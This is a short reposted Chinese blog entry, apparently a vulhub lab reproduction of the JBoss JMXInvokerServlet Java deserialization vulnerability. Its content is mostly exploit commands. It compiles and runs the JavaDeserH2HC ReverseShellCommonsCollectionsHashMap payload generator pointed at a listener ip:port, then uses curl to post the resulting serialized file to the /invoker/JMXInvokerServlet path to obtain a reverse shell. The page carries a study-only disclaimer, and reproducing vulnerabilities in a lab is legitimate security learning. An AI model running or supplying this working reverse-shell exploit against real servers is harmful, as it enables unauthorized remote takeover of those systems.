碼上快樂

相關內容    簡體    繁體

JBoss JMXInvokerServlet 反序列化漏洞

本文轉載自   查看原文   2020-12-26 10:53   444    遵守國家網絡安全法/ 切莫用於其他用途/ 不可用於非法途徑后果自負/ 僅供學習交流/ vulhub漏洞復現

1.搭建環境

 

 2.注解利用工具

 

 2.通用工具

工具:JavaDeserH2HC.zip

下載地址:

命令

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap ip:port //監聽機的ip和端口

執行命令
漏洞路徑:/invoker/JMXInvokerServlet

curl http://192.168.100.188:8080//invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 CVE-2017-7504-JBoss JMXInvokerServlet 反序列化 Java安全之JBoss反序列化漏洞分析 CVE-2017-12149JBoss 反序列化漏洞利用 CVE-2017-7504 JBOSS反序列化漏洞復現 Jboss反序列化漏洞復現(CVE-2017-12149) Jboss反序列化漏洞復現(CVE-2017-12149) 6.JBoss5.x6.x 反序列化漏洞(CVE-2017-12149)復現 jboss CVE-2015-7501 反序列化漏洞復現 PHP反序列化漏洞 PHP反序列化漏洞
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM